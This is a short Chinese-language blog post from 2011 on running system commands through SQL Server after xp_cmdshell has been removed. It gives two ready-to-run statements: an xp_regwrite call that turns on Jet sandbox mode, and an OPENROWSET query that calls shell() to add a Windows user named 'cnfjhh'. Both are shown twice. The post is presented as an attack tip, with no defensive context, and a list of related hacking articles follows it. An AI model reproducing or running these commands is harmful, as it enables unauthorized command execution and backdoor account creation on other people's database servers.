SA 沙盤模式下不用恢復xp_cmdshell和xplog70.dll也執行命令
更新時間:2011年01月04日 23:53:03 作者:
sa下刪除xp_cmdshell和xplog70.dll時候的一種辦法,不算新的了,
也被一些人不斷的再次提出來,為了方便自己記憶再寫出來,
在這種情況下,要執行命令,條件是要有xp_regwrite。
首先開啟沙盤模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb執行系統命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb執行系統命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
您可能感興趣的文章:
相關文章
超初級的linux后門制作方法...2006-10-10
不錯的一篇玩轉arp的文章...2007-06-06
如何利用HTML格式化你的硬盤...2006-09-09
輕松設置讓系統不受惡意代碼攻擊...2006-09-09
菜鳥黑客入門攻擊及防范技巧...2006-09-09
網絡后門面面觀...2006-10-10
天意商務系統后臺管理帳號破解html版...2006-10-10
網上保障隱私十大秘技...2006-09-09
黑客如何給你的系統種木馬...2006-09-09
如何成為一名黑客...2006-09-09
最新評論